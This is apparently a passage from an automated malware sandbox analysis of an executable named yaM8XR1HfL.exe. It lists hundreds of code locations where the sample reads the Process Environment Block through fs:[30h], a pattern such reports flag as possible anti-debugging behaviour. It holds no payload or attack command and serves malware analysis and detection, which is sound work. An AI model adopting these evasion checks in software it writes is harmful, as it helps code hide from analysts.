          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147E388 mov eax, dword ptr fs:[00000030h]4_2_0147E388
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01478397 mov eax, dword ptr fs:[00000030h]4_2_01478397
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01478397 mov eax, dword ptr fs:[00000030h]4_2_01478397
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01478397 mov eax, dword ptr fs:[00000030h]4_2_01478397
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0153A250 mov eax, dword ptr fs:[00000030h]4_2_0153A250
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0153A250 mov eax, dword ptr fs:[00000030h]4_2_0153A250
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0155625D mov eax, dword ptr fs:[00000030h]4_2_0155625D
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01486259 mov eax, dword ptr fs:[00000030h]4_2_01486259
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01508243 mov eax, dword ptr fs:[00000030h]4_2_01508243
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01508243 mov ecx, dword ptr fs:[00000030h]4_2_01508243
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147A250 mov eax, dword ptr fs:[00000030h]4_2_0147A250
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01530274 mov eax, dword ptr fs:[00000030h]4_2_01530274
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01530274 mov eax, dword ptr fs:[00000030h]4_2_01530274
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01530274 mov eax, dword ptr fs:[00000030h]4_2_01530274
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01530274 mov eax, dword ptr fs:[00000030h]4_2_01530274
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01530274 mov eax, dword ptr fs:[00000030h]4_2_01530274
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01530274 mov eax, dword ptr fs:[00000030h]4_2_01530274
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01530274 mov eax, dword ptr fs:[00000030h]4_2_01530274
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01530274 mov eax, dword ptr fs:[00000030h]4_2_01530274
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01530274 mov eax, dword ptr fs:[00000030h]4_2_01530274
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01530274 mov eax, dword ptr fs:[00000030h]4_2_01530274
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01530274 mov eax, dword ptr fs:[00000030h]4_2_01530274
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01530274 mov eax, dword ptr fs:[00000030h]4_2_01530274
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01484260 mov eax, dword ptr fs:[00000030h]4_2_01484260
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01484260 mov eax, dword ptr fs:[00000030h]4_2_01484260
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01484260 mov eax, dword ptr fs:[00000030h]4_2_01484260
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147826B mov eax, dword ptr fs:[00000030h]4_2_0147826B
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147823B mov eax, dword ptr fs:[00000030h]4_2_0147823B
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015562D6 mov eax, dword ptr fs:[00000030h]4_2_015562D6
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148A2C3 mov eax, dword ptr fs:[00000030h]4_2_0148A2C3
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148A2C3 mov eax, dword ptr fs:[00000030h]4_2_0148A2C3
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148A2C3 mov eax, dword ptr fs:[00000030h]4_2_0148A2C3
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148A2C3 mov eax, dword ptr fs:[00000030h]4_2_0148A2C3
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148A2C3 mov eax, dword ptr fs:[00000030h]4_2_0148A2C3
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014902E1 mov eax, dword ptr fs:[00000030h]4_2_014902E1
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014902E1 mov eax, dword ptr fs:[00000030h]4_2_014902E1
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014902E1 mov eax, dword ptr fs:[00000030h]4_2_014902E1
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BE284 mov eax, dword ptr fs:[00000030h]4_2_014BE284
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BE284 mov eax, dword ptr fs:[00000030h]4_2_014BE284
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01500283 mov eax, dword ptr fs:[00000030h]4_2_01500283
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01500283 mov eax, dword ptr fs:[00000030h]4_2_01500283
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01500283 mov eax, dword ptr fs:[00000030h]4_2_01500283
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014902A0 mov eax, dword ptr fs:[00000030h]4_2_014902A0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014902A0 mov eax, dword ptr fs:[00000030h]4_2_014902A0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015162A0 mov eax, dword ptr fs:[00000030h]4_2_015162A0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015162A0 mov ecx, dword ptr fs:[00000030h]4_2_015162A0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015162A0 mov eax, dword ptr fs:[00000030h]4_2_015162A0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015162A0 mov eax, dword ptr fs:[00000030h]4_2_015162A0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015162A0 mov eax, dword ptr fs:[00000030h]4_2_015162A0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015162A0 mov eax, dword ptr fs:[00000030h]4_2_015162A0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01488550 mov eax, dword ptr fs:[00000030h]4_2_01488550
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01488550 mov eax, dword ptr fs:[00000030h]4_2_01488550
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B656A mov eax, dword ptr fs:[00000030h]4_2_014B656A
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B656A mov eax, dword ptr fs:[00000030h]4_2_014B656A
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B656A mov eax, dword ptr fs:[00000030h]4_2_014B656A
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01516500 mov eax, dword ptr fs:[00000030h]4_2_01516500
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01554500 mov eax, dword ptr fs:[00000030h]4_2_01554500
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01554500 mov eax, dword ptr fs:[00000030h]4_2_01554500
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01554500 mov eax, dword ptr fs:[00000030h]4_2_01554500
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01554500 mov eax, dword ptr fs:[00000030h]4_2_01554500
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01554500 mov eax, dword ptr fs:[00000030h]4_2_01554500
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01554500 mov eax, dword ptr fs:[00000030h]4_2_01554500
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01554500 mov eax, dword ptr fs:[00000030h]4_2_01554500
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AE53E mov eax, dword ptr fs:[00000030h]4_2_014AE53E
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AE53E mov eax, dword ptr fs:[00000030h]4_2_014AE53E
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AE53E mov eax, dword ptr fs:[00000030h]4_2_014AE53E
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AE53E mov eax, dword ptr fs:[00000030h]4_2_014AE53E
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AE53E mov eax, dword ptr fs:[00000030h]4_2_014AE53E
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01490535 mov eax, dword ptr fs:[00000030h]4_2_01490535
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01490535 mov eax, dword ptr fs:[00000030h]4_2_01490535
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01490535 mov eax, dword ptr fs:[00000030h]4_2_01490535
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01490535 mov eax, dword ptr fs:[00000030h]4_2_01490535
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01490535 mov eax, dword ptr fs:[00000030h]4_2_01490535
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01490535 mov eax, dword ptr fs:[00000030h]4_2_01490535
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BE5CF mov eax, dword ptr fs:[00000030h]4_2_014BE5CF
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BE5CF mov eax, dword ptr fs:[00000030h]4_2_014BE5CF
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014865D0 mov eax, dword ptr fs:[00000030h]4_2_014865D0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BA5D0 mov eax, dword ptr fs:[00000030h]4_2_014BA5D0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BA5D0 mov eax, dword ptr fs:[00000030h]4_2_014BA5D0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BC5ED mov eax, dword ptr fs:[00000030h]4_2_014BC5ED
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BC5ED mov eax, dword ptr fs:[00000030h]4_2_014BC5ED
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014825E0 mov eax, dword ptr fs:[00000030h]4_2_014825E0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AE5E7 mov eax, dword ptr fs:[00000030h]4_2_014AE5E7
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AE5E7 mov eax, dword ptr fs:[00000030h]4_2_014AE5E7
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AE5E7 mov eax, dword ptr fs:[00000030h]4_2_014AE5E7
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AE5E7 mov eax, dword ptr fs:[00000030h]4_2_014AE5E7
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AE5E7 mov eax, dword ptr fs:[00000030h]4_2_014AE5E7
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AE5E7 mov eax, dword ptr fs:[00000030h]4_2_014AE5E7
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AE5E7 mov eax, dword ptr fs:[00000030h]4_2_014AE5E7
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AE5E7 mov eax, dword ptr fs:[00000030h]4_2_014AE5E7
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B4588 mov eax, dword ptr fs:[00000030h]4_2_014B4588
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01482582 mov eax, dword ptr fs:[00000030h]4_2_01482582
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01482582 mov ecx, dword ptr fs:[00000030h]4_2_01482582
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BE59C mov eax, dword ptr fs:[00000030h]4_2_014BE59C
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015005A7 mov eax, dword ptr fs:[00000030h]4_2_015005A7
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015005A7 mov eax, dword ptr fs:[00000030h]4_2_015005A7
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015005A7 mov eax, dword ptr fs:[00000030h]4_2_015005A7
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014A45B1 mov eax, dword ptr fs:[00000030h]4_2_014A45B1
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014A45B1 mov eax, dword ptr fs:[00000030h]4_2_014A45B1
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0153A456 mov eax, dword ptr fs:[00000030h]4_2_0153A456
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BE443 mov eax, dword ptr fs:[00000030h]4_2_014BE443
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BE443 mov eax, dword ptr fs:[00000030h]4_2_014BE443
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BE443 mov eax, dword ptr fs:[00000030h]4_2_014BE443
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BE443 mov eax, dword ptr fs:[00000030h]4_2_014BE443
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BE443 mov eax, dword ptr fs:[00000030h]4_2_014BE443
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BE443 mov eax, dword ptr fs:[00000030h]4_2_014BE443
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BE443 mov eax, dword ptr fs:[00000030h]4_2_014BE443
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BE443 mov eax, dword ptr fs:[00000030h]4_2_014BE443
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014A245A mov eax, dword ptr fs:[00000030h]4_2_014A245A
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147645D mov eax, dword ptr fs:[00000030h]4_2_0147645D
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0150C460 mov ecx, dword ptr fs:[00000030h]4_2_0150C460
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AA470 mov eax, dword ptr fs:[00000030h]4_2_014AA470
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AA470 mov eax, dword ptr fs:[00000030h]4_2_014AA470
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AA470 mov eax, dword ptr fs:[00000030h]4_2_014AA470
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B8402 mov eax, dword ptr fs:[00000030h]4_2_014B8402
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B8402 mov eax, dword ptr fs:[00000030h]4_2_014B8402
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B8402 mov eax, dword ptr fs:[00000030h]4_2_014B8402
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147C427 mov eax, dword ptr fs:[00000030h]4_2_0147C427
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147E420 mov eax, dword ptr fs:[00000030h]4_2_0147E420
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147E420 mov eax, dword ptr fs:[00000030h]4_2_0147E420
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147E420 mov eax, dword ptr fs:[00000030h]4_2_0147E420
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01506420 mov eax, dword ptr fs:[00000030h]4_2_01506420
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01506420 mov eax, dword ptr fs:[00000030h]4_2_01506420
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01506420 mov eax, dword ptr fs:[00000030h]4_2_01506420
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01506420 mov eax, dword ptr fs:[00000030h]4_2_01506420
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01506420 mov eax, dword ptr fs:[00000030h]4_2_01506420
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01506420 mov eax, dword ptr fs:[00000030h]4_2_01506420
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01506420 mov eax, dword ptr fs:[00000030h]4_2_01506420
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BA430 mov eax, dword ptr fs:[00000030h]4_2_014BA430
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014804E5 mov ecx, dword ptr fs:[00000030h]4_2_014804E5
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0153A49A mov eax, dword ptr fs:[00000030h]4_2_0153A49A
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0150A4B0 mov eax, dword ptr fs:[00000030h]4_2_0150A4B0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014864AB mov eax, dword ptr fs:[00000030h]4_2_014864AB
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B44B0 mov ecx, dword ptr fs:[00000030h]4_2_014B44B0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01504755 mov eax, dword ptr fs:[00000030h]4_2_01504755
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B674D mov esi, dword ptr fs:[00000030h]4_2_014B674D
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B674D mov eax, dword ptr fs:[00000030h]4_2_014B674D
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B674D mov eax, dword ptr fs:[00000030h]4_2_014B674D
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0150E75D mov eax, dword ptr fs:[00000030h]4_2_0150E75D
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01480750 mov eax, dword ptr fs:[00000030h]4_2_01480750
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C2750 mov eax, dword ptr fs:[00000030h]4_2_014C2750
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C2750 mov eax, dword ptr fs:[00000030h]4_2_014C2750
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01488770 mov eax, dword ptr fs:[00000030h]4_2_01488770
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01490770 mov eax, dword ptr fs:[00000030h]4_2_01490770
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01490770 mov eax, dword ptr fs:[00000030h]4_2_01490770
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01490770 mov eax, dword ptr fs:[00000030h]4_2_01490770
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01490770 mov eax, dword ptr fs:[00000030h]4_2_01490770
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01490770 mov eax, dword ptr fs:[00000030h]4_2_01490770
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01490770 mov eax, dword ptr fs:[00000030h]4_2_01490770
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01490770 mov eax, dword ptr fs:[00000030h]4_2_01490770
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01490770 mov eax, dword ptr fs:[00000030h]4_2_01490770
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01490770 mov eax, dword ptr fs:[00000030h]4_2_01490770
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01490770 mov eax, dword ptr fs:[00000030h]4_2_01490770
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01490770 mov eax, dword ptr fs:[00000030h]4_2_01490770
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01490770 mov eax, dword ptr fs:[00000030h]4_2_01490770
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BC700 mov eax, dword ptr fs:[00000030h]4_2_014BC700
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01480710 mov eax, dword ptr fs:[00000030h]4_2_01480710
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B0710 mov eax, dword ptr fs:[00000030h]4_2_014B0710
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BC720 mov eax, dword ptr fs:[00000030h]4_2_014BC720
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BC720 mov eax, dword ptr fs:[00000030h]4_2_014BC720
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B273C mov eax, dword ptr fs:[00000030h]4_2_014B273C
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B273C mov ecx, dword ptr fs:[00000030h]4_2_014B273C
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B273C mov eax, dword ptr fs:[00000030h]4_2_014B273C
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014FC730 mov eax, dword ptr fs:[00000030h]4_2_014FC730
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148C7C0 mov eax, dword ptr fs:[00000030h]4_2_0148C7C0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015007C3 mov eax, dword ptr fs:[00000030h]4_2_015007C3
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014A27ED mov eax, dword ptr fs:[00000030h]4_2_014A27ED
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014A27ED mov eax, dword ptr fs:[00000030h]4_2_014A27ED
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014A27ED mov eax, dword ptr fs:[00000030h]4_2_014A27ED
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0150E7E1 mov eax, dword ptr fs:[00000030h]4_2_0150E7E1
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014847FB mov eax, dword ptr fs:[00000030h]4_2_014847FB
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014847FB mov eax, dword ptr fs:[00000030h]4_2_014847FB
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0152678E mov eax, dword ptr fs:[00000030h]4_2_0152678E
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014807AF mov eax, dword ptr fs:[00000030h]4_2_014807AF
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015347A0 mov eax, dword ptr fs:[00000030h]4_2_015347A0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0149C640 mov eax, dword ptr fs:[00000030h]4_2_0149C640
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BA660 mov eax, dword ptr fs:[00000030h]4_2_014BA660
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BA660 mov eax, dword ptr fs:[00000030h]4_2_014BA660
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0154866E mov eax, dword ptr fs:[00000030h]4_2_0154866E
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0154866E mov eax, dword ptr fs:[00000030h]4_2_0154866E
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B2674 mov eax, dword ptr fs:[00000030h]4_2_014B2674
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0149260B mov eax, dword ptr fs:[00000030h]4_2_0149260B
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0149260B mov eax, dword ptr fs:[00000030h]4_2_0149260B
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0149260B mov eax, dword ptr fs:[00000030h]4_2_0149260B
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0149260B mov eax, dword ptr fs:[00000030h]4_2_0149260B
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0149260B mov eax, dword ptr fs:[00000030h]4_2_0149260B
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0149260B mov eax, dword ptr fs:[00000030h]4_2_0149260B
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0149260B mov eax, dword ptr fs:[00000030h]4_2_0149260B
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014FE609 mov eax, dword ptr fs:[00000030h]4_2_014FE609
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C2619 mov eax, dword ptr fs:[00000030h]4_2_014C2619
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148262C mov eax, dword ptr fs:[00000030h]4_2_0148262C
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B6620 mov eax, dword ptr fs:[00000030h]4_2_014B6620
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B8620 mov eax, dword ptr fs:[00000030h]4_2_014B8620
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0149E627 mov eax, dword ptr fs:[00000030h]4_2_0149E627
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BA6C7 mov ebx, dword ptr fs:[00000030h]4_2_014BA6C7
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BA6C7 mov eax, dword ptr fs:[00000030h]4_2_014BA6C7
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015006F1 mov eax, dword ptr fs:[00000030h]4_2_015006F1
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015006F1 mov eax, dword ptr fs:[00000030h]4_2_015006F1
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014FE6F2 mov eax, dword ptr fs:[00000030h]4_2_014FE6F2
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014FE6F2 mov eax, dword ptr fs:[00000030h]4_2_014FE6F2
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014FE6F2 mov eax, dword ptr fs:[00000030h]4_2_014FE6F2
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014FE6F2 mov eax, dword ptr fs:[00000030h]4_2_014FE6F2
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01484690 mov eax, dword ptr fs:[00000030h]4_2_01484690
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01484690 mov eax, dword ptr fs:[00000030h]4_2_01484690
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BC6A6 mov eax, dword ptr fs:[00000030h]4_2_014BC6A6
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B66B0 mov eax, dword ptr fs:[00000030h]4_2_014B66B0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01554940 mov eax, dword ptr fs:[00000030h]4_2_01554940
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01500946 mov eax, dword ptr fs:[00000030h]4_2_01500946
